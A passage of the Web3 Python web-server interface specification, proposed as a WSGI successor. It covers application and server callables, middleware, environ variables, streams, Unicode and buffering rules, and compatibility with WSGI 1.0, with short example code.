Although we refer to it as an “application” object, this should not +be construed to mean that application developers will use Web3 as a +web programming API. It is assumed that application developers +will continue to use existing, high-level framework services to +develop their applications. Web3 is a tool for framework and +server developers, and is not intended to directly support +application developers.)

+
+

An example of an application which is a function (simple_app):

+
def simple_app(environ):
+    """Simplest possible application object"""
+    status = b'200 OK'
+    headers = [(b'Content-type', b'text/plain')]
+    body = [b'Hello world!\n']
+    return body, status, headers
+
+
+

An example of an application which is an instance (simple_app):

+
class AppClass(object):
+
+    """Produce the same output, but using an instance.  An
+    instance of this class must be instantiated before it is
+    passed to the server.  """
+
+  def __call__(self, environ):
+        status = b'200 OK'
+        headers = [(b'Content-type', b'text/plain')]
+        body = [b'Hello world!\n']
+        return body, status, headers
+
+simple_app = AppClass()
+
+
+

Alternately, an application callable may return a callable instead of +the tuple if the server supports asynchronous execution. See +information concerning web3.async for more information.

+
+
+

The Server/Gateway Side

+

The server or gateway invokes the application callable once for each +request it receives from an HTTP client, that is directed at the +application. To illustrate, here is a simple CGI gateway, implemented +as a function taking an application object. Note that this simple +example has limited error handling, because by default an uncaught +exception will be dumped to sys.stderr and logged by the web +server.

+
import locale
+import os
+import sys
+
+encoding = locale.getpreferredencoding()
+
+stdout = sys.stdout
+
+if hasattr(sys.stdout, 'buffer'):
+    # Python 3 compatibility; we need to be able to push bytes out
+    stdout = sys.stdout.buffer
+
+def get_environ():
+    d = {}
+    for k, v in os.environ.items():
+        # Python 3 compatibility
+        if not isinstance(v, bytes):
+            # We must explicitly encode the string to bytes under
+            # Python 3.1+
+            v = v.encode(encoding, 'surrogateescape')
+        d[k] = v
+    return d
+
+def run_with_cgi(application):
+
+    environ = get_environ()
+    environ['web3.input']        = sys.stdin
+    environ['web3.errors']       = sys.stderr
+    environ['web3.version']      = (1, 0)
+    environ['web3.multithread']  = False
+    environ['web3.multiprocess'] = True
+    environ['web3.run_once']     = True
+    environ['web3.async']        = False
+
+    if environ.get('HTTPS', b'off') in (b'on', b'1'):
+        environ['web3.url_scheme'] = b'https'
+    else:
+        environ['web3.url_scheme'] = b'http'
+
+    rv = application(environ)
+    if hasattr(rv, '__call__'):
+        raise TypeError('This webserver does not support asynchronous '
+                        'responses.')
+    body, status, headers = rv
+
+    CLRF = b'\r\n'
+
+    try:
+        stdout.write(b'Status: ' + status + CRLF)
+        for header_name, header_val in headers:
+            stdout.write(header_name + b': ' + header_val + CRLF)
+        stdout.write(CRLF)
+        for chunk in body:
+            stdout.write(chunk)
+            stdout.flush()
+    finally:
+        if hasattr(body, 'close'):
+            body.close()
+
+
+
+
+

Middleware: Components that Play Both Sides

+

A single object may play the role of a server with respect to some +application(s), while also acting as an application with respect to +some server(s). Such “middleware” components can perform such +functions as:

+
    +
  • Routing a request to different application objects based on the +target URL, after rewriting the environ accordingly.
  • +
  • Allowing multiple applications or frameworks to run side by side in +the same process.
  • +
  • Load balancing and remote processing, by forwarding requests and +responses over a network.
  • +
  • Perform content postprocessing, such as applying XSL stylesheets.
  • +
+

The presence of middleware in general is transparent to both the +“server/gateway” and the “application/framework” sides of the +interface, and should require no special support. A user who desires +to incorporate middleware into an application simply provides the +middleware component to the server, as if it were an application, and +configures the middleware component to invoke the application, as if +the middleware component were a server. Of course, the “application” +that the middleware wraps may in fact be another middleware component +wrapping another application, and so on, creating what is referred to +as a “middleware stack”.

+

A middleware must support asynchronous execution if possible or fall +back to disabling itself.

+

Here a middleware that changes the HTTP_HOST key if an X-Host +header exists and adds a comment to all html responses:

+
import time
+
+def apply_filter(app, environ, filter_func):
+    """Helper function that passes the return value from an
+    application to a filter function when the results are
+    ready.
+    """
+    app_response = app(environ)
+
+    # synchronous response, filter now
+    if not hasattr(app_response, '__call__'):
+        return filter_func(*app_response)
+
+    # asynchronous response.  filter when results are ready
+    def polling_function():
+        rv = app_response()
+        if rv is not None:
+            return filter_func(*rv)
+    return polling_function
+
+def proxy_and_timing_support(app):
+    def new_application(environ):
+        def filter_func(body, status, headers):
+            now = time.time()
+            for key, value in headers:
+                if key.lower() == b'content-type' and \
+                   value.split(b';')[0] == b'text/html':
+                    # assumes ascii compatible encoding in body,
+                    # but the middleware should actually parse the
+                    # content type header and figure out the
+                    # encoding when doing that.
+                    body += ('<!-- Execution time: %.2fsec -->' %
+                             (now - then)).encode('ascii')
+                    break
+            return body, status, headers
+        then = time.time()
+        host = environ.get('HTTP_X_HOST')
+        if host is not None:
+            environ['HTTP_HOST'] = host
+
+        # use the apply_filter function that applies a given filter
+        # function for both async and sync responses.
+        return apply_filter(app, environ, filter_func)
+    return new_application
+
+app = proxy_and_timing_support(app)
+
+
+
+
+
+

Specification Details

+

The application callable must accept one positional argument. For the +sake of illustration, we have named it environ, but it is not +required to have this name. A server or gateway must invoke the +application object using a positional (not keyword) argument. +(E.g. by calling body, status, headers = application(environ) as +shown above.)

+

The environ parameter is a dictionary object, containing CGI-style +environment variables. This object must be a builtin Python +dictionary (not a subclass, UserDict or other dictionary +emulation), and the application is allowed to modify the dictionary in +any way it desires. The dictionary must also include certain +Web3-required variables (described in a later section), and may also +include server-specific extension variables, named according to a +convention that will be described below.

+

When called by the server, the application object must return a tuple +yielding three elements: status, headers and body, or, if +supported by an async server, an argumentless callable which either +returns None or a tuple of those three elements.

+

The status element is a status in bytes of the form b'999 +Message here'.

+

headers is a Python list of (header_name, header_value) pairs +describing the HTTP response header. The headers structure must +be a literal Python list; it must yield two-tuples. Both +header_name and header_value must be bytes values.

+

The body is an iterable yielding zero or more bytes instances. +This can be accomplished in a variety of ways, such as by returning a +list containing bytes instances as body, or by returning a +generator function as body that yields bytes instances, or by the +body being an instance of a class which is iterable. Regardless +of how it is accomplished, the application object must always return a +body iterable yielding zero or more bytes instances.

+

The server or gateway must transmit the yielded bytes to the client in +an unbuffered fashion, completing the transmission of each set of +bytes before requesting another one. (In other words, applications +should perform their own buffering. See the Buffering and +Streaming section below for more on how application output must be +handled.)

+

The server or gateway should treat the yielded bytes as binary byte +sequences: in particular, it should ensure that line endings are not +altered. The application is responsible for ensuring that the +string(s) to be written are in a format suitable for the client. (The +server or gateway may apply HTTP transfer encodings, or perform +other transformations for the purpose of implementing HTTP features +such as byte-range transmission. See Other HTTP Features, below, +for more details.)

+

If the body iterable returned by the application has a close() +method, the server or gateway must call that method upon +completion of the current request, whether the request was completed +normally, or terminated early due to an error. This is to support +resource release by the application amd is intended to complement PEP +325’s generator support, and other common iterables with close() +methods.

+

Finally, servers and gateways must not directly use any other +attributes of the body iterable returned by the application.

+
+

environ Variables

+

The environ dictionary is required to contain various CGI +environment variables, as defined by the Common Gateway Interface +specification [2].

+

The following CGI variables must be present. Each key is a native +string. Each value is a bytes instance.

+
+

Note

+

In Python 3.1+, a “native string” is a str type decoded using +the surrogateescape error handler, as done by +os.environ.__getitem__. In Python 2.6 and 2.7, a “native +string” is a str types representing a set of bytes.

+
+
+
REQUEST_METHOD
The HTTP request method, such as "GET" or "POST".
+
SCRIPT_NAME
The initial portion of the request URL’s “path” that corresponds to +the application object, so that the application knows its virtual +“location”. This may be the empty bytes instance if the application +corresponds to the “root” of the server. SCRIPT_NAME will be a +bytes instance representing a sequence of URL-encoded segments +separated by the slash character (/). It is assumed that +%2F characters will be decoded into literal slash characters +within PATH_INFO, as per CGI.
+
PATH_INFO
The remainder of the request URL’s “path”, designating the virtual +“location” of the request’s target within the application. This +may be a bytes instance if the request URL targets the +application root and does not have a trailing slash. PATH_INFO will +be a bytes instance representing a sequence of URL-encoded segments +separated by the slash character (/). It is assumed that +%2F characters will be decoded into literal slash characters +within PATH_INFO, as per CGI.
+
QUERY_STRING
The portion of the request URL (in bytes) that follows the "?", +if any, or the empty bytes instance.
+
SERVER_NAME, SERVER_PORT
When combined with SCRIPT_NAME and PATH_INFO (or their raw +equivalents), these variables can be used to complete the URL. +Note, however, that HTTP_HOST, if present, should be used in +preference to SERVER_NAME for reconstructing the request URL. +See the URL Reconstruction section below for more detail. +SERVER_PORT should be a bytes instance, not an integer.
+
SERVER_PROTOCOL
The version of the protocol the client used to send the request. +Typically this will be something like "HTTP/1.0" or +"HTTP/1.1" and may be used by the application to determine how +to treat any HTTP request headers. (This variable should probably +be called REQUEST_PROTOCOL, since it denotes the protocol used +in the request, and is not necessarily the protocol that will be +used in the server’s response. However, for compatibility with CGI +we have to keep the existing name.)
+
+

The following CGI values may present be in the Web3 environment. +Each key is a native string. Each value is a bytes instances.

+
+
CONTENT_TYPE
The contents of any Content-Type fields in the HTTP request.
+
CONTENT_LENGTH
The contents of any Content-Length fields in the HTTP request.
+
HTTP_ Variables
Variables corresponding to the client-supplied HTTP request headers +(i.e., variables whose names begin with "HTTP_"). The presence +or absence of these variables should correspond with the presence or +absence of the appropriate HTTP header in the request.
+
+

A server or gateway should attempt to provide as many other CGI +variables as are applicable, each with a string for its key and a +bytes instance for its value. In addition, if SSL is in use, the +server or gateway should also provide as many of the Apache SSL +environment variables [4] as are applicable, such as HTTPS=on and +SSL_PROTOCOL. Note, however, that an application that uses any +CGI variables other than the ones listed above are necessarily +non-portable to web servers that do not support the relevant +extensions. (For example, web servers that do not publish files will +not be able to provide a meaningful DOCUMENT_ROOT or +PATH_TRANSLATED.)

+

A Web3-compliant server or gateway should document what variables +it provides, along with their definitions as appropriate. +Applications should check for the presence of any variables they +require, and have a fallback plan in the event such a variable is +absent.

+

Note that CGI variable values must be bytes instances, if they are +present at all. It is a violation of this specification for a CGI +variable’s value to be of any type other than bytes. On Python 2, +this means they will be of type str. On Python 3, this means they +will be of type bytes.

+

They keys of all CGI and non-CGI variables in the environ, however, +must be “native strings” (on both Python 2 and Python 3, they will be +of type str).

+

In addition to the CGI-defined variables, the environ dictionary +may also contain arbitrary operating-system “environment +variables”, and must contain the following Web3-defined variables.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
VariableValue
web3.versionThe tuple (1, 0), representing Web3 +version 1.0.
web3.url_schemeA bytes value representing the “scheme” portion of +the URL at which the application is being +invoked. Normally, this will have the value +b"http" or b"https", as appropriate.
web3.inputAn input stream (file-like object) from which bytes +constituting the HTTP request body can be read. +(The server or gateway may perform reads +on-demand as requested by the application, or +it may pre- read the client’s request body and +buffer it in-memory or on disk, or use any +other technique for providing such an input +stream, according to its preference.)
web3.errorsAn output stream (file-like object) to which error +output text can be written, for the purpose of +recording program or other errors in a +standardized and possibly centralized location. +This should be a “text mode” stream; i.e., +applications should use "\n" as a line +ending, and assume that it will be converted to +the correct line ending by the server/gateway. +Applications may not send bytes to the +‘write’ method of this stream; they may only +send text.

For many servers, web3.errors will be the +server’s main error log. Alternatively, this +may be sys.stderr, or a log file of some +sort. The server’s documentation should +include an explanation of how to configure this +or where to find the recorded output. A server +or gateway may supply different error streams +to different applications, if this is desired.

+
web3.multithreadThis value should evaluate true if the +application object may be simultaneously +invoked by another thread in the same process, +and should evaluate false otherwise.
web3.multiprocessThis value should evaluate true if an +equivalent application object may be +simultaneously invoked by another process, and +should evaluate false otherwise.
web3.run_onceThis value should evaluate true if the server +or gateway expects (but does not guarantee!) +that the application will only be invoked this +one time during the life of its containing +process. Normally, this will only be true for +a gateway based on CGI (or something similar).
web3.script_nameThe non-URL-decoded SCRIPT_NAME value. +Through a historical inequity, by virtue of the +CGI specification, SCRIPT_NAME is present +within the environment as an already +URL-decoded string. This is the original +URL-encoded value derived from the request URI. +If the server cannot provide this value, it +must omit it from the environ.
web3.path_infoThe non-URL-decoded PATH_INFO value. +Through a historical inequity, by virtue of the +CGI specification, PATH_INFO is present +within the environment as an already +URL-decoded string. This is the original +URL-encoded value derived from the request URI. +If the server cannot provide this value, it +must omit it from the environ.
web3.asyncThis is True if the webserver supports +async invocation. In that case an application +is allowed to return a callable instead of a +tuple with the response. The exact semantics +are not specified by this specification.
+

Finally, the environ dictionary may also contain server-defined +variables. These variables should have names which are native +strings, composed of only lower-case letters, numbers, dots, and +underscores, and should be prefixed with a name that is unique to the +defining server or gateway. For example, mod_web3 might define +variables with names like mod_web3.some_variable.

+
+

Input Stream

+

The input stream (web3.input) provided by the server must support +the following methods:

+ + + + + + + + + + + + + + + + + + + + +
MethodNotes
read(size)1,4
readline([size])1,2,4
readlines([size])1,3,4
__iter__()4
+

The semantics of each method are as documented in the Python Library +Reference, except for these notes as listed in the table above:

+
    +
  1. The server is not required to read past the client’s specified +Content-Length, and is allowed to simulate an end-of-file +condition if the application attempts to read past that point. The +application should not attempt to read more data than is +specified by the CONTENT_LENGTH variable.
  2. +
  3. The implementation must support the optional size argument to +readline().
  4. +
  5. The application is free to not supply a size argument to +readlines(), and the server or gateway is free to ignore the +value of any supplied size argument.
  6. +
  7. The read, readline and __iter__ methods must return a +bytes instance. The readlines method must return a sequence +which contains instances of bytes.
  8. +
+

The methods listed in the table above must be supported by all +servers conforming to this specification. Applications conforming to +this specification must not use any other methods or attributes of +the input object. In particular, applications must not +attempt to close this stream, even if it possesses a close() +method.

+

The input stream should silently ignore attempts to read more than the +content length of the request. If no content length is specified the +stream must be a dummy stream that does not return anything.

+
+
+

Error Stream

+

The error stream (web3.errors) provided by the server must support +the following methods:

+ + + + + + + + + + + + + + + + + + + + + +
MethodStreamNotes
flush()errors1
write(str)errors2
writelines(seq)errors2
+

The semantics of each method are as documented in the Python Library +Reference, except for these notes as listed in the table above:

+
    +
  1. Since the errors stream may not be rewound, servers and +gateways are free to forward write operations immediately, without +buffering. In this case, the flush() method may be a no-op. +Portable applications, however, cannot assume that output is +unbuffered or that flush() is a no-op. They must call +flush() if they need to ensure that output has in fact been +written. (For example, to minimize intermingling of data from +multiple processes writing to the same error log.)
  2. +
  3. The write() method must accept a string argument, but needn’t +necessarily accept a bytes argument. The writelines() method +must accept a sequence argument that consists entirely of strings, +but needn’t necessarily accept any bytes instance as a member of +the sequence.
  4. +
+

The methods listed in the table above must be supported by all +servers conforming to this specification. Applications conforming to +this specification must not use any other methods or attributes of +the errors object. In particular, applications must not +attempt to close this stream, even if it possesses a close() +method.

+
+
+
+

Values Returned by A Web3 Application

+

Web3 applications return a tuple in the form (status, headers, +body). If the server supports asynchronous applications +(web3.async), the response may be a callable object (which accepts no +arguments).

+

The status value is assumed by a gateway or server to be an HTTP +“status” bytes instance like b'200 OK' or b'404 Not Found'. +That is, it is a string consisting of a Status-Code and a +Reason-Phrase, in that order and separated by a single space, with no +surrounding whitespace or other characters. (See RFC 2616, Section +6.1.1 for more information.) The string must not contain control +characters, and must not be terminated with a carriage return, +linefeed, or combination thereof.

+

The headers value is assumed by a gateway or server to be a +literal Python list of (header_name, header_value) tuples. Each +header_name must be a bytes instance representing a valid HTTP +header field-name (as defined by RFC 2616, Section 4.2), without a +trailing colon or other punctuation. Each header_value must be a +bytes instance and must not include any control characters, +including carriage returns or linefeeds, either embedded or at the +end. (These requirements are to minimize the complexity of any +parsing that must be performed by servers, gateways, and intermediate +response processors that need to inspect or modify response headers.)

+

In general, the server or gateway is responsible for ensuring that +correct headers are sent to the client: if the application omits a +header required by HTTP (or other relevant specifications that are in +effect), the server or gateway must add it. For example, the HTTP +Date: and Server: headers would normally be supplied by the +server or gateway. The gateway must however not override values with +the same name if they are emitted by the application.

+

(A reminder for server/gateway authors: HTTP header names are +case-insensitive, so be sure to take that into consideration when +examining application-supplied headers!)

+

Applications and middleware are forbidden from using HTTP/1.1 +“hop-by-hop” features or headers, any equivalent features in HTTP/1.0, +or any headers that would affect the persistence of the client’s +connection to the web server. These features are the exclusive +province of the actual web server, and a server or gateway should +consider it a fatal error for an application to attempt sending them, +and raise an error if they are supplied as return values from an +application in the headers structure. (For more specifics on +“hop-by-hop” features and headers, please see the Other HTTP +Features section below.)

+
+
+

Dealing with Compatibility Across Python Versions

+

Creating Web3 code that runs under both Python 2.6/2.7 and Python 3.1+ +requires some care on the part of the developer. In general, the Web3 +specification assumes a certain level of equivalence between the +Python 2 str type and the Python 3 bytes type. For example, +under Python 2, the values present in the Web3 environ will be +instances of the str type; in Python 3, these will be instances of +the bytes type. The Python 3 bytes type does not possess all +the methods of the Python 2 str type, and some methods which it +does possess behave differently than the Python 2 str type. +Effectively, to ensure that Web3 middleware and applications work +across Python versions, developers must do these things:

+
    +
  1. Do not assume comparison equivalence between text values and bytes +values. If you do so, your code may work under Python 2, but it +will not work properly under Python 3. For example, don’t write +somebytes == 'abc'. This will sometimes be true on Python 2 +but it will never be true on Python 3, because a sequence of bytes +never compares equal to a string under Python 3. Instead, always +compare a bytes value with a bytes value, e.g. “somebytes == +b’abc’”. Code which does this is compatible with and works the +same in Python 2.6, 2.7, and 3.1. The b in front of 'abc' +signals to Python 3 that the value is a literal bytes instance; +under Python 2 it’s a forward compatibility placebo.
  2. +
  3. Don’t use the __contains__ method (directly or indirectly) of +items that are meant to be byteslike without ensuring that its +argument is also a bytes instance. If you do so, your code may +work under Python 2, but it will not work properly under Python 3. +For example, 'abc' in somebytes' will raise a TypeError +under Python 3, but it will return True under Python 2.6 and +2.7. However, b'abc' in somebytes will work the same on both +versions. In Python 3.2, this restriction may be partially +removed, as it’s rumored that bytes types may obtain a __mod__ +implementation.
  4. +
  5. __getitem__ should not be used.
  6. +
  7. Don’t try to use the format method or the __mod__ method of +instances of bytes (directly or indirectly). In Python 2, the +str type which we treat equivalently to Python 3’s bytes +supports these method but actual Python 3’s bytes instances +don’t support these methods. If you use these methods, your code +will work under Python 2, but not under Python 3.
  8. +
  9. Do not try to concatenate a bytes value with a string value. This +may work under Python 2, but it will not work under Python 3. For +example, doing 'abc' + somebytes will work under Python 2, but +it will result in a TypeError under Python 3. Instead, always +make sure you’re concatenating two items of the same type, +e.g. b'abc' + somebytes.
  10. +
+

Web3 expects byte values in other places, such as in all the values +returned by an application.

+

In short, to ensure compatibility of Web3 application code between +Python 2 and Python 3, in Python 2, treat CGI and server variable +values in the environment as if they had the Python 3 bytes API +even though they actually have a more capable API. Likewise for all +stringlike values returned by a Web3 application.

+
+
+

Buffering and Streaming

+

Generally speaking, applications will achieve the best throughput by +buffering their (modestly-sized) output and sending it all at once. +This is a common approach in existing frameworks: the output is +buffered in a StringIO or similar object, then transmitted all at +once, along with the response headers.

+

The corresponding approach in Web3 is for the application to simply +return a single-element body iterable (such as a list) containing +the response body as a single string. This is the recommended +approach for the vast majority of application functions, that render +HTML pages whose text easily fits in memory.

+

For large files, however, or for specialized uses of HTTP streaming +(such as multipart “server push”), an application may need to provide +output in smaller blocks (e.g. to avoid loading a large file into +memory). It’s also sometimes the case that part of a response may be +time-consuming to produce, but it would be useful to send ahead the +portion of the response that precedes it.

+

In these cases, applications will usually return a body iterator +(often a generator-iterator) that produces the output in a +block-by-block fashion. These blocks may be broken to coincide with +multipart boundaries (for “server push”), or just before +time-consuming tasks (such as reading another block of an on-disk +file).

+

Web3 servers, gateways, and middleware must not delay the +transmission of any block; they must either fully transmit the +block to the client, or guarantee that they will continue transmission +even while the application is producing its next block. A +server/gateway or middleware may provide this guarantee in one of +three ways:

+
    +
  1. Send the entire block to the operating system (and request that any +O/S buffers be flushed) before returning control to the +application, OR
  2. +
  3. Use a different thread to ensure that the block continues to be +transmitted while the application produces the next block.
  4. +
  5. (Middleware only) send the entire block to its parent +gateway/server.
  6. +
+

By providing this guarantee, Web3 allows applications to ensure that +transmission will not become stalled at an arbitrary point in their +output data. This is critical for proper functioning of +e.g. multipart “server push” streaming, where data between multipart +boundaries should be transmitted in full to the client.

+
+
+

Unicode Issues

+

HTTP does not directly support Unicode, and neither does this +interface. All encoding/decoding must be handled by the +application; all values passed to or from the server must be of +the Python 3 type bytes or instances of the Python 2 type str, +not Python 2 unicode or Python 3 str objects.

+

All “bytes instances” referred to in this specification must:

+
    +
  • On Python 2, be of type str.
  • +
  • On Python 3, be of type bytes.
  • +
+

All “bytes instances” must not :

+
    +
  • On Python 2, be of type unicode.
  • +
  • On Python 3, be of type str.
  • +
+

The result of using a textlike object where a byteslike object is +required is undefined.

+

Values returned from a Web3 app as a status or as response headers +must follow RFC 2616 with respect to encoding. That is, the bytes +returned must contain a character stream of ISO-8859-1 characters, or +the character stream should use RFC 2047 MIME encoding.

+

On Python platforms which do not have a native bytes-like type +(e.g. IronPython, etc.), but instead which generally use textlike +strings to represent bytes data, the definition of “bytes instance” +can be changed: their “bytes instances” must be native strings that +contain only code points representable in ISO-8859-1 encoding +(\u0000 through \u00FF, inclusive). It is a fatal error for +an application on such a platform to supply strings containing any +other Unicode character or code point. Similarly, servers and +gateways on those platforms must not supply strings to an +application containing any other Unicode characters.

+
+
+

HTTP 1.1 Expect/Continue

+

Servers and gateways that implement HTTP 1.1 must provide +transparent support for HTTP 1.1’s “expect/continue” mechanism. This +may be done in any of several ways:

+
    +
  1. Respond to requests containing an Expect: 100-continue request +with an immediate “100 Continue” response, and proceed normally.
  2. +
  3. Proceed with the request normally, but provide the application with +a web3.input stream that will send the “100 Continue” response +if/when the application first attempts to read from the input +stream. The read request must then remain blocked until the client +responds.
  4. +
  5. Wait until the client decides that the server does not support +expect/continue, and sends the request body on its own. (This is +suboptimal, and is not recommended.)
  6. +
+

Note that these behavior restrictions do not apply for HTTP 1.0 +requests, or for requests that are not directed to an application +object. For more information on HTTP 1.1 Expect/Continue, see +RFC 2616, sections 8.2.3 and 10.1.1.

+
+
+

Other HTTP Features

+

In general, servers and gateways should “play dumb” and allow the +application complete control over its output. They should only make +changes that do not alter the effective semantics of the application’s +response. It is always possible for the application developer to add +middleware components to supply additional features, so server/gateway +developers should be conservative in their implementation. In a +sense, a server should consider itself to be like an HTTP “gateway +server”, with the application being an HTTP “origin server”. (See +RFC 2616, section 1.3, for the definition of these terms.)

+

However, because Web3 servers and applications do not communicate via +HTTP, what RFC 2616 calls “hop-by-hop” headers do not apply to Web3 +internal communications. Web3 applications must not generate any +“hop-by-hop” headers, +attempt to use HTTP features that would +require them to generate such headers, or rely on the content of any +incoming “hop-by-hop” headers in the environ dictionary. Web3 +servers must handle any supported inbound “hop-by-hop” headers on +their own, such as by decoding any inbound Transfer-Encoding, +including chunked encoding if applicable.

+

Applying these principles to a variety of HTTP features, it should be +clear that a server may handle cache validation via the +If-None-Match and If-Modified-Since request headers and the +Last-Modified and ETag response headers. However, it is not +required to do this, and the application should perform its own +cache validation if it wants to support that feature, since the +server/gateway is not required to do such validation.

+

Similarly, a server may re-encode or transport-encode an +application’s response, but the application should use a suitable +content encoding on its own, and must not apply a transport +encoding. A server may transmit byte ranges of the application’s +response if requested by the client, and the application doesn’t +natively support byte ranges. Again, however, the application +should perform this function on its own if desired.

+

Note that these restrictions on applications do not necessarily mean +that every application must reimplement every HTTP feature; many HTTP +features can be partially or fully implemented by middleware +components, thus freeing both server and application authors from +implementing the same features over and over again.

+
+
+

Thread Support

+

Thread support, or lack thereof, is also server-dependent. Servers +that can run multiple requests in parallel, should also provide +the option of running an application in a single-threaded fashion, so +that applications or frameworks that are not thread-safe may still be +used with that server.

+
+
+
+

Implementation/Application Notes

+
+

Server Extension APIs

+

Some server authors may wish to expose more advanced APIs, that +application or framework authors can use for specialized purposes. +For example, a gateway based on mod_python might wish to expose +part of the Apache API as a Web3 extension.

+

In the simplest case, this requires nothing more than defining an +environ variable, such as mod_python.some_api. But, in many +cases, the possible presence of middleware can make this difficult. +For example, an API that offers access to the same HTTP headers that +are found in environ variables, might return different data if +environ has been modified by middleware.

+

In general, any extension API that duplicates, supplants, or bypasses +some portion of Web3 functionality runs the risk of being incompatible +with middleware components. Server/gateway developers should not +assume that nobody will use middleware, because some framework +developers specifically organize their frameworks to function almost +entirely as middleware of various kinds.

+

So, to provide maximum compatibility, servers and gateways that +provide extension APIs that replace some Web3 functionality, must +design those APIs so that they are invoked using the portion of the +API that they replace. For example, an extension API to access HTTP +request headers must require the application to pass in its current +environ, so that the server/gateway may verify that HTTP headers +accessible via the API have not been altered by middleware. If the +extension API cannot guarantee that it will always agree with +environ about the contents of HTTP headers, it must refuse service +to the application, e.g. by raising an error, returning None +instead of a header collection, or whatever is appropriate to the API.

+

These guidelines also apply to middleware that adds information such +as parsed cookies, form variables, sessions, and the like to +environ. Specifically, such middleware should provide these +features as functions which operate on environ, rather than simply +stuffing values into environ. This helps ensure that information +is calculated from environ after any middleware has done any URL +rewrites or other environ modifications.

+

It is very important that these “safe extension” rules be followed by +both server/gateway and middleware developers, in order to avoid a +future in which middleware developers are forced to delete any and all +extension APIs from environ to ensure that their mediation isn’t +being bypassed by applications using those extensions!

+
+
+

Application Configuration

+

This specification does not define how a server selects or obtains an +application to invoke. These and other configuration options are +highly server-specific matters. It is expected that server/gateway +authors will document how to configure the server to execute a +particular application object, and with what options (such as +threading options).

+

Framework authors, on the other hand, should document how to create an +application object that wraps their framework’s functionality. The +user, who has chosen both the server and the application framework, +must connect the two together. However, since both the framework and +the server have a common interface, this should be merely a mechanical +matter, rather than a significant engineering effort for each new +server/framework pair.

+

Finally, some applications, frameworks, and middleware may wish to use +the environ dictionary to receive simple string configuration +options. Servers and gateways should support this by allowing an +application’s deployer to specify name-value pairs to be placed in +environ. In the simplest case, this support can consist merely of +copying all operating system-supplied environment variables from +os.environ into the environ dictionary, since the deployer in +principle can configure these externally to the server, or in the CGI +case they may be able to be set via the server’s configuration files.

+

Applications should try to keep such required variables to a +minimum, since not all servers will support easy configuration of +them. Of course, even in the worst case, persons deploying an +application can create a script to supply the necessary configuration +values:

+
from the_app import application
+
+def new_app(environ):
+    environ['the_app.configval1'] = b'something'
+    return application(environ)
+
+
+

But, most existing applications and frameworks will probably only need +a single configuration value from environ, to indicate the +location of their application or framework-specific configuration +file(s). (Of course, applications should cache such configuration, to +avoid having to re-read it upon each invocation.)

+
+
+

URL Reconstruction

+

If an application wishes to reconstruct a request’s complete URL (as a +bytes object), it may do so using the following algorithm:

+
host = environ.get('HTTP_HOST')
+
+scheme = environ['web3.url_scheme']
+port = environ['SERVER_PORT']
+query = environ['QUERY_STRING']
+
+url = scheme + b'://'
+
+if host:
+    url += host
+else:
+    url += environ['SERVER_NAME']
+
+    if scheme == b'https':
+        if port != b'443':
+           url += b':' + port
+    else:
+        if port != b'80':
+           url += b':' + port
+
+if 'web3.script_name' in url:
+    url += url_quote(environ['web3.script_name'])
+else:
+    url += environ['SCRIPT_NAME']
+if 'web3.path_info' in environ:
+    url += url_quote(environ['web3.path_info'])
+else:
+    url += environ['PATH_INFO']
+if query:
+    url += b'?' + query
+
+
+

Note that such a reconstructed URL may not be precisely the same URI +as requested by the client. Server rewrite rules, for example, may +have modified the client’s originally requested URL to place it in a +canonical form.

+
+
+
+

Open Questions

+
    +
  • file_wrapper replacement. Currently nothing is specified here +but it’s clear that the old system of in-band signalling is broken +if it does not provide a way to figure out as a middleware in the +process if the response is a file wrapper.
  • +
+
+
+

Points of Contention

+

Outlined below are potential points of contention regarding this +specification.

+
+

WSGI 1.0 Compatibility

+

Components written using the WSGI 1.0 specification will not +transparently interoperate with components written using this +specification. That’s because the goals of this proposal and the +goals of WSGI 1.0 are not directly aligned.

+

WSGI 1.0 is obliged to provide specification-level backwards +compatibility with versions of Python between 2.2 and 2.7. This +specification, however, ditches Python 2.5 and lower compatibility in +order to provide compatibility between relatively recent versions of +Python 2 (2.6 and 2.7) as well as relatively recent versions of Python +3 (3.1).

+

It is currently impossible to write components which work reliably +under both Python 2 and Python 3 using the WSGI 1.0 specification, +because the specification implicitly posits that CGI and server +variable values in the environ and values returned via +start_response represent a sequence of bytes that can be addressed +using the Python 2 string API. It posits such a thing because that +sort of data type was the sensible way to represent bytes in all +Python 2 versions, and WSGI 1.0 was conceived before Python 3 existed.

+

Python 3’s str type supports the full API provided by the Python 2 +str type, but Python 3’s str type does not represent a +sequence of bytes, it instead represents text. Therefore, using it to +represent environ values also requires that the environ byte sequence +be decoded to text via some encoding. We cannot decode these bytes to +text (at least in any way where the decoding has any meaning other +than as a tunnelling mechanism) without widening the scope of WSGI to +include server and gateway knowledge of decoding policies and +mechanics. WSGI 1.0 never concerned itself with encoding and +decoding. It made statements about allowable transport values, and +suggested that various values might be best decoded as one encoding or +another, but it never required a server to perform any decoding +before

+

Python 3 does not have a stringlike type that can be used instead to +represent bytes: it has a bytes type. A bytes type operates quite +a bit like a Python 2 str in Python 3.1+, but it lacks behavior +equivalent to str.__mod__ and its iteration protocol, and +containment, sequence treatment, and equivalence comparisons are +different.

+

In either case, there is no type in Python 3 that behaves just like +the Python 2 str type, and a way to create such a type doesn’t +exist because there is no such thing as a “String ABC” which would +allow a suitable type to be built. Due to this design +incompatibility, existing WSGI 1.0 servers, middleware, and +applications will not work under Python 3, even after they are run +through 2to3.

+

Existing Web-SIG discussions about updating the WSGI specification so +that it is possible to write a WSGI application that runs in both +Python 2 and Python 3 tend to revolve around creating a +specification-level equivalence between the Python 2 str type +(which represents a sequence of bytes) and the Python 3 str type +(which represents text). Such an equivalence becomes strained in +various areas, given the different roles of these types. An arguably +more straightforward equivalence exists between the Python 3 bytes +type API and a subset of the Python 2 str type API. This +specification exploits this subset equivalence.

+

In the meantime, aside from any Python 2 vs. Python 3 compatibility +issue, as various discussions on Web-SIG have pointed out, the WSGI +1.0 specification is too general, providing support (via .write) +for asynchronous applications at the expense of implementation +complexity. This specification uses the fundamental incompatibility +between WSGI 1.0 and Python 3 as a natural divergence point to create +a specification with reduced complexity by changing specialized +support for asynchronous applications.

+

To provide backwards compatibility for older WSGI 1.0 applications, so +that they may run on a Web3 stack, it is presumed that Web3 middleware +will be created which can be used “in front” of existing WSGI 1.0 +applications, allowing those existing WSGI 1.0 applications to run +under a Web3 stack. This middleware will require, when under Python +3, an equivalence to be drawn between Python 3 str types and the +bytes values represented by the HTTP request and all the attendant +encoding-guessing (or configuration) it implies.

+
+

Note

+

